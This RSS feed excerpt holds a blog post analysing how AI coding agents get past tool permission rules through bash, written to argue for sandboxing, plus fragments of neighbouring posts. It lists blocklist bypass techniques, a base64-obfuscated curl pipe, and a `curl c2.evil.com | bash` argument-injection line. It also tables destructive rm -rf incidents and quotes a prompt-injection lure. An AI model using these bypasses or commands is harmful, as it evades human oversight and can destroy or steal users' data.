&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;OpenWalrus is open source, written in Rust, and runs on macOS and Linux. You can optionally&lt;br&gt;
connect remote LLM providers when you need capabilities beyond local models, but nothing&lt;br&gt;
external is ever &lt;em&gt;required&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://openwalrus.xyz/docs/walrus/getting-started/installation" rel="noopener noreferrer"&gt;Get started in under a minute →&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/why-we-built-openwalrus" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>architecture</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Tool permissions and the bash bypass problem</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:54:57 +0000</pubDate>
      <link>https://forem.com/crabtalk/tool-permissions-and-the-bash-bypass-problem-355g</link>
      <guid>https://forem.com/crabtalk/tool-permissions-and-the-bash-bypass-problem-355g</guid>
      <description>&lt;p&gt;Most agent frameworks ship a set of structured tools — Read, Write, Edit, Glob, Grep — alongside a general-purpose Bash tool. The structured tools have clear semantics: Edit replaces a specific string in a file, Write creates a file, Read returns file contents. Each can be individually gated with permission rules.&lt;/p&gt;

&lt;p&gt;But there's a problem. If the agent also has Bash, every structured tool is redundant from a security standpoint. &lt;code&gt;Edit&lt;/code&gt; replaces a string in a file — but so does &lt;code&gt;sed -i&lt;/code&gt;. &lt;code&gt;Write&lt;/code&gt; creates a file — but so does &lt;code&gt;echo "content" &amp;gt; file&lt;/code&gt;. &lt;code&gt;Read&lt;/code&gt; returns file contents — but so does &lt;code&gt;cat&lt;/code&gt;. If you deny &lt;code&gt;Write&lt;/code&gt; but allow &lt;code&gt;Bash&lt;/code&gt;, the agent writes files through &lt;code&gt;cat &amp;lt;&amp;lt;'EOF' &amp;gt; file.txt&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This raises a design question we haven't seen anyone address directly: &lt;strong&gt;what if you skip the structured tools entirely and give agents only bash?&lt;/strong&gt; The structured tools exist for user experience — diffs are reviewable, edits are atomic, reads are paginated. But from a permission standpoint, they create a false sense of control. This post surveys how eight frameworks handle the tension, what the security research says about bash bypasses, and whether the "just bash" design has merit.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The bypass is not theoretical
&lt;/h2&gt;

&lt;p&gt;The gap between "deny the edit tool" and "the agent edits via bash" is not a theoretical concern. It has been exploited, documented, and CVE-assigned.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude Code.&lt;/strong&gt; &lt;a href="https://github.com/anthropics/claude-code/issues/31292" rel="noopener noreferrer"&gt;GitHub issue #31292&lt;/a&gt; documents the most direct case: a user set &lt;code&gt;disallowedTools: [Write, Edit, NotebookEdit]&lt;/code&gt; with a system prompt rule "NEVER write code." The agent bypassed it by running &lt;code&gt;sed -i 's/hello/goodbye/' file.txt&lt;/code&gt;. No error. No warning. The &lt;code&gt;disallowedTools&lt;/code&gt; enforcement blocks the named tool functions but not equivalent Bash operations. The issue author's assessment: "this never worked."&lt;/p&gt;

&lt;p&gt;A second issue (&lt;a href="https://github.com/anthropics/claude-code/issues/6527" rel="noopener noreferrer"&gt;#6527&lt;/a&gt;, 17 comments) shows that when &lt;code&gt;Bash&lt;/code&gt; is in the &lt;code&gt;allow&lt;/code&gt; list, the &lt;code&gt;ask&lt;/code&gt; list for specific bash patterns is completely ignored. A user tried to allow general bash while requiring approval for &lt;code&gt;rm&lt;/code&gt; and &lt;code&gt;git push&lt;/code&gt;. Result: &lt;code&gt;rm&lt;/code&gt; executed without confirmation.&lt;/p&gt;

&lt;p&gt;In June 2025, &lt;a href="https://flatt.tech/research/posts/pwning-claude-code-in-8-different-ways/" rel="noopener noreferrer"&gt;Flatt Security&lt;/a&gt; documented eight distinct techniques to bypass Claude Code's command blocklist (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66032" rel="noopener noreferrer"&gt;CVE-2025-66032&lt;/a&gt;):&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;man --html&lt;/code&gt; — missed by the blocklist, executes arbitrary programs&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sort --compress-program&lt;/code&gt; — invokes any executable as a "compressor"&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;history -s&lt;/code&gt; + &lt;code&gt;history -a&lt;/code&gt; — injects commands into shell startup files&lt;/li&gt;
&lt;li&gt;Git argument abbreviation — &lt;code&gt;--upload-pa&lt;/code&gt; bypasses exact-match for &lt;code&gt;--upload-pack&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sed&lt;/code&gt; e-flag — replacement text executes as a shell command&lt;/li&gt;
&lt;li&gt;Xargs flag mismatch — regex misinterpreted which flags consume arguments&lt;/li&gt;
&lt;li&gt;Ripgrep &lt;code&gt;$IFS&lt;/code&gt; expansion — whitespace injection enables &lt;code&gt;--pre=sh&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Bash &lt;code&gt;@P&lt;/code&gt; expansion — multi-stage variable expansion chains bypass &lt;code&gt;$(&lt;/code&gt; filtering&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Claude Code replaced its blocklist with an allowlist after these findings.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cursor.&lt;/strong&gt; &lt;a href="https://www.backslash.security/blog/cursor-ai-security-flaw-autorun-denylist" rel="noopener noreferrer"&gt;Backslash Security&lt;/a&gt; proved the mathematical impossibility of denylists: &lt;code&gt;echo JChjdXJsIGdvb2dsZS5jb20pCgoK | base64 -d | zsh&lt;/code&gt; bypasses any denylist entry for &lt;code&gt;curl&lt;/code&gt;. &lt;code&gt;bash -c "curl google.com"&lt;/code&gt; wraps denied commands in subshells. &lt;code&gt;""e""cho&lt;/code&gt; produces infinite quote variations. Their conclusion: "For every command in a Cursor denylist, there are infinite commands not present in the denylist which, when executed, have the same behavior." Cursor &lt;a href="https://www.theregister.com/2025/07/21/cursor_ai_safeguards_easily_bypassed/" rel="noopener noreferrer"&gt;deprecated its denylist&lt;/a&gt; in release 1.3.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Trail of Bits.&lt;/strong&gt; &lt;a href="https://blog.trailofbits.com/2025/10/22/prompt-injection-to-rce-in-ai-agents/" rel="noopener noreferrer"&gt;Their research&lt;/a&gt; showed that even allowlisted "safe" commands can be weaponized: &lt;code&gt;go test -exec 'bash -c "curl c2.evil.com | bash"'&lt;/code&gt;, &lt;code&gt;rg --pre=sh&lt;/code&gt;, &lt;code&gt;fd -x=python3&lt;/code&gt;. They reference &lt;a href="https://gtfobins.github.io/" rel="noopener noreferrer"&gt;GTFOBINS&lt;/a&gt;, which catalogs hundreds of legitimate Unix binaries that accept arguments enabling arbitrary code execution.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The real-world damage
&lt;/h2&gt;

&lt;p&gt;The Claude Code issue tracker documents what happens when agents have unrestricted bash:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Issue&lt;/th&gt;
&lt;th&gt;What happened&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/30816" rel="noopener noreferrer"&gt;#30816&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;rm -rf&lt;/code&gt; on local drive folders — months of production code deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/28521" rel="noopener noreferrer"&gt;#28521&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;find / -delete&lt;/code&gt; during security test — all personal files in /home deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/27063" rel="noopener noreferrer"&gt;#27063&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;drizzle-kit push --force&lt;/code&gt; — 60+ production database tables destroyed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/29179" rel="noopener noreferrer"&gt;#29179&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;git clean -fd&lt;/code&gt; after &lt;code&gt;git rm -rf .&lt;/code&gt; — gitignored directories permanently deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/32637" rel="noopener noreferrer"&gt;#32637&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cp -a&lt;/code&gt; + &lt;code&gt;rm -rf&lt;/code&gt; on iCloud stubs — 110+ sensitive documents destroyed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://github.com/anthropics/claude-code/issues/27675" rel="noopener noreferrer"&gt;#27675&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;python3 manage.py migrate&lt;/code&gt; + raw SQL — irreversible schema changes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A &lt;a href="https://www.reddit.com/r/ClaudeAI/" rel="noopener noreferrer"&gt;December 2025 Reddit incident&lt;/a&gt; hit 197 points on Hacker News: a user asked Claude to clean up packages and it ran &lt;code&gt;rm -rf tests/ patches/ plan/ ~/&lt;/code&gt; — the trailing &lt;code&gt;~/&lt;/code&gt; expanded to the entire home directory. In January 2026, Claude Cowork executed &lt;code&gt;rm -rf&lt;/code&gt; on 11GB of user data, then marked its task list item "Delete user data folder: Completed."&lt;/p&gt;

&lt;h2&gt;
  
  
  How frameworks handle it today
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Two philosophies
&lt;/h3&gt;

&lt;p&gt;Every framework falls into one of two camps:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gate the tool, trust the shell.&lt;/strong&gt; Claude Code, LangGraph, Google ADK, and CrewAI distinguish between structured tools and shell access. Each structured tool can be individually permitted or denied. Bash is treated as a separate, higher-risk tool with its own approval flow. The problem: this creates the bypass gap. Denying &lt;code&gt;Write&lt;/code&gt; while allowing &lt;code&gt;Bash&lt;/code&gt; is security theater.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gate the environment, give full access within it.&lt;/strong&gt; Codex CLI, Cursor (post-1.3), and increasingly Claude Code use OS-level sandboxes as the primary boundary. The agent gets full access to bash and every structured tool — but the sandbox constrains &lt;em&gt;where&lt;/em&gt; those tools can operate. Writes are limited to the workspace. Network is blocked. The &lt;code&gt;.git&lt;/code&gt; directory is read-only. The bypass gap vanishes because both paths are constrained by the same kernel-level policy.&lt;/p&gt;

&lt;h3&gt;
  
  
  The sandbox approach
&lt;/h3&gt;

&lt;p&gt;Codex CLI implements this most cleanly. &lt;a href="https://developer.apple.com/documentation/security/app-sandbox" rel="noopener noreferrer"&gt;Seatbelt&lt;/a&gt; on macOS, &lt;a href="https://docs.kernel.org/security/landlock.html" rel="noopener noreferrer"&gt;Landlock&lt;/a&gt; + seccomp on Linux. Three modes: Suggest (approve everything), Auto (auto-approve within workspace), Full-auto (auto-approve all). Even in full-auto, the sandbox prevents writes outside the workspace. The file-edit vs. bash distinction is irrelevant — both are constrained by the same OS-level policy.&lt;/p&gt;

&lt;p&gt;Cursor adopted the same approach after deprecating its denylist. Their insight: &lt;a href="https://cursor.com/blog/agent-sandboxing" rel="noopener noreferrer"&gt;sandboxed agents stop 40% less often&lt;/a&gt; than unsandboxed ones. The sandbox actually &lt;em&gt;improves&lt;/em&gt; developer experience by replacing per-command approval prompts with environment-level constraints.&lt;/p&gt;

&lt;p&gt;Claude Code's &lt;a href="https://code.claude.com/docs/en/sandboxing" rel="noopener noreferrer"&gt;sandbox&lt;/a&gt; constrains bash and its child processes. But a &lt;a href="https://github.com/anthropics/claude-code/issues/26616" rel="noopener noreferrer"&gt;GitHub issue (#26616)&lt;/a&gt; reveals the gap: the Read, Write, Edit, Glob, and Grep tools execute in the same process as Claude Code itself, outside the sandbox. A prompt injection could use Read to access credentials or Edit to modify configuration — without triggering any sandbox restriction. The sandbox covers bash but not the structured tools.&lt;/p&gt;

&lt;h3&gt;
  
  
  The permission-model approach
&lt;/h3&gt;

&lt;p&gt;Claude Code's &lt;a href="https://code.claude.com/docs/en/permissions" rel="noopener noreferrer"&gt;permission system&lt;/a&gt; is the most granular. Five modes (&lt;code&gt;default&lt;/code&gt;, &lt;code&gt;acceptEdits&lt;/code&gt;, &lt;code&gt;plan&lt;/code&gt;, &lt;code&gt;dontAsk&lt;/code&gt;, &lt;code&gt;bypassPermissions&lt;/code&gt;). Pattern-based specifiers: &lt;code&gt;Bash(npm run *)&lt;/code&gt; allows npm commands, &lt;code&gt;Edit(/src/**/*.ts)&lt;/code&gt; restricts edits to TypeScript files. Shell-aware matching understands &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; operators so &lt;code&gt;Bash(safe-cmd *)&lt;/code&gt; won't approve &lt;code&gt;safe-cmd &amp;amp;&amp;amp; dangerous-cmd&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;OpenClaw separates file tools and exec tools into different groups (&lt;code&gt;group:fs&lt;/code&gt; vs &lt;code&gt;group:runtime&lt;/code&gt;). Denying &lt;code&gt;group:runtime&lt;/code&gt; while allowing &lt;code&gt;group:fs&lt;/code&gt; blocks shell access while keeping file operations. Deny always wins in the policy hierarchy.&lt;/p&gt;

&lt;p&gt;Google ADK provides &lt;code&gt;before_tool_callback&lt;/code&gt; hooks that can inspect arguments and block execution. LangGraph provides &lt;code&gt;interrupt_on&lt;/code&gt; for per-tool human approval. Both are developer-dependent — no automatic enforcement.&lt;/p&gt;

&lt;p&gt;Aider and CrewAI use trust-based models. Aider's &lt;code&gt;--yes&lt;/code&gt; flag bypasses all prompts. CrewAI's tool assignment is all-or-nothing with no runtime permission checks.&lt;/p&gt;

&lt;h2&gt;
  
  
  What if there's only bash?
&lt;/h2&gt;

&lt;p&gt;Here's the contrarian design position: &lt;strong&gt;if bash makes structured tools redundant for security, maybe the solution is to drop the structured tools and treat bash as the single tool that matters.&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Arguments for bash-only
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;One permission boundary instead of many.&lt;/strong&gt; With only bash, there's exactly one tool to gate. No bypass gap. No confusion about which tool has which permission. The agent either has shell access or it doesn't — and if it does, the sandbox is the security boundary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Simpler mental model.&lt;/strong&gt; Users don't need to understand the difference between &lt;code&gt;Edit&lt;/code&gt; permissions and &lt;code&gt;Bash(sed *)&lt;/code&gt; permissions. There's one tool. Either it's allowed, or it's not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What agents actually do.&lt;/strong&gt; Many agent workflows are bash-heavy anyway. Running tests, installing packages, git operations, building projects — all happen through the shell. The structured tools are a convenience layer for file editing, but the agent could accomplish the same work through &lt;code&gt;sed&lt;/code&gt;, &lt;code&gt;patch&lt;/code&gt;, &lt;code&gt;cat&lt;/code&gt;, or &lt;code&gt;echo&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Arguments against bash-only
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Reviewability.&lt;/strong&gt; The strongest argument for structured tools isn't security — it's user experience. An &lt;code&gt;Edit&lt;/code&gt; call shows a clean diff: old string, new string, file path. A &lt;code&gt;sed -i 's/old/new/g' file.txt&lt;/code&gt; command is harder to review. A &lt;code&gt;cat &amp;lt;&amp;lt;'EOF' &amp;gt; file.txt&lt;/code&gt; command replaces the entire file with no diff. For long or complex edits, structured tools make the agent's intent transparent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Atomicity.&lt;/strong&gt; &lt;code&gt;Edit&lt;/code&gt; either succeeds or fails as a unit. A bash pipeline — &lt;code&gt;sed&lt;/code&gt; then &lt;code&gt;mv&lt;/code&gt; then &lt;code&gt;chmod&lt;/code&gt; — can fail partway through, leaving files in inconsistent states. Structured tools avoid this class of errors by design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The system prompt compliance problem.&lt;/strong&gt; Claude Code's system prompt instructs the agent: "Do NOT use the Bash to run &lt;code&gt;cat&lt;/code&gt;, &lt;code&gt;head&lt;/code&gt;, &lt;code&gt;tail&lt;/code&gt;, &lt;code&gt;sed&lt;/code&gt;, &lt;code&gt;awk&lt;/code&gt;, or &lt;code&gt;echo&lt;/code&gt; commands. Instead, use the appropriate dedicated tool." &lt;a href="https://github.com/anthropics/claude-code/issues/32193" rel="noopener noreferrer"&gt;GitHub issue #32193&lt;/a&gt; documents the broader problem: "Every rule in CLAUDE.md is advisory to the model. There is no enforcement mechanism." The agent sometimes uses bash for file operations despite being told not to — but structured tools at least &lt;em&gt;exist&lt;/em&gt; as the preferred path. Remove them, and the agent has no choice but bash for everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sandbox limits.&lt;/strong&gt; Even with OS-level sandboxing, bash can reach external services. &lt;code&gt;drizzle-kit push --force&lt;/code&gt; destroyed 60+ production tables (&lt;a href="https://github.com/anthropics/claude-code/issues/27063" rel="noopener noreferrer"&gt;#27063&lt;/a&gt;) — a command that operates on a &lt;em&gt;remote&lt;/em&gt; database through a network connection. &lt;code&gt;gh release delete-asset&lt;/code&gt; deleted assets from GitHub (&lt;a href="https://github.com/anthropics/claude-code/issues/29120" rel="noopener noreferrer"&gt;#29120&lt;/a&gt;). Sandboxing constrains &lt;em&gt;where&lt;/em&gt; the agent operates on the local filesystem, not &lt;em&gt;what&lt;/em&gt; it does via network services.&lt;/p&gt;

&lt;h3&gt;
  
  
  The middle ground: bash with capability declarations
&lt;/h3&gt;

&lt;p&gt;The &lt;a href="https://github.com/anthropics/claude-code/issues/6046" rel="noopener noreferrer"&gt;Codex Exec tool proposal&lt;/a&gt; suggests a compromise: an &lt;code&gt;Exec&lt;/code&gt; tool that invokes commands &lt;em&gt;without shell interpretation&lt;/em&gt; (analogous to &lt;code&gt;subprocess.run(shell=False)&lt;/code&gt;). Arguments are passed as arrays, eliminating shell injection. But as the author acknowledged, &lt;code&gt;sed -i&lt;/code&gt;, &lt;code&gt;python -c&lt;/code&gt;, and &lt;code&gt;perl -i -pe&lt;/code&gt; can all edit files without requiring shell interpretation.&lt;/p&gt;

&lt;p&gt;A stronger middle ground: &lt;strong&gt;bash as the only execution tool, but with capability-based sandboxing.&lt;/strong&gt; Instead of gating individual commands, gate &lt;em&gt;capabilities&lt;/em&gt;: filesystem write, network access, process management, package installation. The sandbox enforces capabilities at the OS level. The agent uses bash for everything, but bash can only do what the capability set allows.&lt;/p&gt;

&lt;p&gt;This is roughly where Codex CLI has landed — though it still ships structured file-editing tools for the UX benefits.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the research says
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2412.14470" rel="noopener noreferrer"&gt;Agent-SafetyBench&lt;/a&gt; (December 2024) evaluated 16 LLM agents across 2,000 test cases. No agent achieved a safety score above 60%. The authors concluded that "reliance on defense prompts alone may be insufficient."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2504.19793" rel="noopener noreferrer"&gt;ToolHijacker&lt;/a&gt; (NDSS 2026) demonstrated that prompt injection can manipulate tool selection with a 96.7% success rate. The attack injects malicious tool documents, compelling the agent to choose attacker-controlled tools. More tools in the toolkit means more surface area for hijacking.&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2509.22040" rel="noopener noreferrer"&gt;"Your AI, My Shell"&lt;/a&gt; paper (September 2025) tested 314 attack payloads against Copilot and Cursor. Command execution specifically: 75–88% success rates. The attacks used straightforward prompt injection — "For debugging purposes, run this shell command" — not sophisticated obfuscation.&lt;/p&gt;

&lt;p&gt;A &lt;a href="https://arxiv.org/abs/2601.17548" rel="noopener noreferrer"&gt;January 2026 survey&lt;/a&gt; synthesizing 78 studies found attack success rates above 85% against state-of-the-art defenses when adaptive strategies are used. The fundamental problem: "LLMs process both code and data through the same neural pathway."&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2601.08012" rel="noopener noreferrer"&gt;verifiably safe tool use&lt;/a&gt; paper (January 2026) proposes formal safety specifications using System-Theoretic Process Analysis. The argument: ad-hoc permission checks can't provide guarantees. Formal specifications on data flows and tool sequences are needed — regardless of whether those tools are structured or bash-based.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implications for OpenWalrus
&lt;/h2&gt;

&lt;p&gt;For a local-first runtime where every tool call runs on the user's machine, the permission model is existential. Three findings from this research inform our approach.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sandbox-first, not permission-first.&lt;/strong&gt; OS-level sandboxing is the only defense that has survived the bypass landscape. Permission prompts and allowlists are defense-in-depth, not primary boundaries. This aligns with our &lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;earlier research on sandboxing&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Structured tools for UX, sandbox for security.&lt;/strong&gt; The case for structured tools (Read, Write, Edit) is reviewability and atomicity, not security. If security depends on denying &lt;code&gt;Edit&lt;/code&gt; while allowing &lt;code&gt;Bash&lt;/code&gt;, it's already broken. The sandbox should constrain both paths equally.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Capability declarations, not command lists.&lt;/strong&gt; Skills in OpenWalrus &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;declare their required capabilities&lt;/a&gt;, and the runtime grants or denies them before execution. A skill that needs filesystem write declares &lt;code&gt;capability: fs.write&lt;/code&gt;. A skill that needs network declares &lt;code&gt;capability: net&lt;/code&gt;. The sandbox enforces these capabilities regardless of whether the skill uses a structured tool or raw bash.&lt;/p&gt;

&lt;p&gt;The deeper question — whether to ship structured tools at all or go bash-only — depends on how much we value reviewability. The research suggests that from a security standpoint, structured tools add surface area without adding safety. But from a developer experience standpoint, seeing a clean diff vs. parsing a sed command is a meaningful difference. The answer may be: &lt;strong&gt;use bash as the single execution primitive, but present structured tool results as a rendering layer&lt;/strong&gt; — the agent runs &lt;code&gt;sed&lt;/code&gt;, but the UI shows a diff.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Is the structured-tool bypass a solvable problem?&lt;/strong&gt; Claude Code's sandbox covers bash but not Edit/Write. Could a unified sandbox cover both? The challenge: structured tools run in-process, so sandboxing them requires sandboxing the agent process itself — which Codex CLI does but others don't.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should bash be the default or the escape hatch?&lt;/strong&gt; Codex CLI ships structured tools as defaults and bash as an option. Aider has no structured tools at all — everything goes through the LLM's edit format plus shell. Which produces better agent behavior?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can capability-based sandboxing replace command-level gating?&lt;/strong&gt; Instead of &lt;code&gt;Bash(npm run *)&lt;/code&gt;, declare &lt;code&gt;capability: process.spawn(npm)&lt;/code&gt;. Instead of &lt;code&gt;Bash(curl *)&lt;/code&gt;, declare &lt;code&gt;capability: net.http&lt;/code&gt;. Is this more maintainable than regex-based command matching?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How should &lt;a href="https://openwalrus.xyz/blog/agent-calling-patterns" rel="noopener noreferrer"&gt;multi-agent systems&lt;/a&gt; inherit permissions?&lt;/strong&gt; When a parent agent delegates to a sub-agent, does the sub-agent get the parent's full bash access? A subset? No bash at all? Current frameworks &lt;a href="https://openwalrus.xyz/blog/multi-agent-coordination" rel="noopener noreferrer"&gt;don't coordinate permissions across agents&lt;/a&gt; any more than they coordinate &lt;a href="https://openwalrus.xyz/blog/context-compaction" rel="noopener noreferrer"&gt;context compaction&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What does "observable permissions" look like?&lt;/strong&gt; For a system where &lt;a href="https://openwalrus.xyz/blog/agent-task-registry" rel="noopener noreferrer"&gt;task state is a runtime primitive&lt;/a&gt;, permission grants and denials should appear in the task tree. When a tool is blocked, the parent should know — not just the agent that attempted it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://code.claude.com/docs/en/permissions" rel="noopener noreferrer"&gt;Claude Code Permissions&lt;/a&gt; — five permission modes, pattern-based specifiers&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://code.claude.com/docs/en/sandboxing" rel="noopener noreferrer"&gt;Claude Code Sandboxing&lt;/a&gt; — OS-level isolation for bash&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.openai.com/codex/agent-approvals-security/" rel="noopener noreferrer"&gt;Codex CLI Security&lt;/a&gt; — sandbox-first architecture&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://flatt.tech/research/posts/pwning-claude-code-in-8-different-ways/" rel="noopener noreferrer"&gt;Flatt Security: 8 Bypasses (CVE-2025-66032)&lt;/a&gt; — why denylists fail&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.backslash.security/blog/cursor-ai-security-flaw-autorun-denylist" rel="noopener noreferrer"&gt;Backslash Security: Cursor Denylist&lt;/a&gt; — mathematical proof of denylist impossibility&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.trailofbits.com/2025/10/22/prompt-injection-to-rce-in-ai-agents/" rel="noopener noreferrer"&gt;Trail of Bits: Prompt Injection to RCE&lt;/a&gt; — allowlisted commands weaponized via argument injection&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2412.14470" rel="noopener noreferrer"&gt;Agent-SafetyBench&lt;/a&gt; — no agent scores above 60% on safety&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2504.19793" rel="noopener noreferrer"&gt;ToolHijacker (NDSS 2026)&lt;/a&gt; — 96.7% success rate on tool selection manipulation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2509.22040" rel="noopener noreferrer"&gt;"Your AI, My Shell"&lt;/a&gt; — 75–88% command execution success via prompt injection&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2601.08012" rel="noopener noreferrer"&gt;Verifiably Safe Tool Use&lt;/a&gt; — formal safety specifications for agent tools&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developer.nvidia.com/blog/practical-security-guidance-for-sandboxing-agentic-workflows-and-managing-execution-risk/" rel="noopener noreferrer"&gt;NVIDIA: Sandboxing Agentic Workflows&lt;/a&gt; — agent-in-sandbox architecture&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/tool-call-permissions" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>How AI frameworks control model thinking</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:54:15 +0000</pubDate>
      <link>https://forem.com/crabtalk/how-ai-frameworks-control-model-thinking-4fi</link>
      <guid>https://forem.com/crabtalk/how-ai-frameworks-control-model-thinking-4fi</guid>
      <description>&lt;p&gt;Every reasoning model can think harder if you ask it to. Claude has &lt;code&gt;budget_tokens&lt;/code&gt; and &lt;code&gt;effort&lt;/code&gt;. OpenAI has &lt;code&gt;reasoning_effort&lt;/code&gt;. Google has thinking levels. The API surface exists. The question is: who decides when to use it?&lt;/p&gt;

&lt;p&gt;We surveyed seven agent frameworks — Claude Code, Cursor, OpenClaw, GitHub Copilot, Windsurf, Aider, and Devin — to understand how they handle model thinking. The approaches split into three camps: frameworks that actively control reasoning depth via API parameters, frameworks that shape thinking through prompts and architecture, and frameworks that don't try to control it at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  The three approaches
&lt;/h2&gt;

&lt;h3&gt;
  
  
  API-parameter-controlled
&lt;/h3&gt;

&lt;p&gt;The framework translates user intent or task signals into provider-specific API parameters — &lt;code&gt;thinking.budget_tokens&lt;/code&gt;, &lt;code&gt;reasoning_effort&lt;/code&gt;, &lt;code&gt;effort&lt;/code&gt; — before the request reaches the model. The model receives explicit instructions about how hard to think.&lt;/p&gt;

&lt;h3&gt;
  
  
  Prompt and architecture controlled
&lt;/h3&gt;

&lt;p&gt;The framework doesn't touch reasoning API parameters. Instead, it shapes thinking through prompt design ("think step by step"), model selection (use a reasoning model for planning, a fast model for editing), or model routing (analyze the request and pick the right tier). The control is indirect.&lt;/p&gt;

&lt;h3&gt;
  
  
  Let it go
&lt;/h3&gt;

&lt;p&gt;The framework sends the prompt to whichever model the user selected and lets the model decide how to reason. No API parameter tuning, no prompt engineering for reasoning depth, no dynamic routing. The user is the router.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Framework-by-framework
&lt;/h2&gt;

&lt;h3&gt;
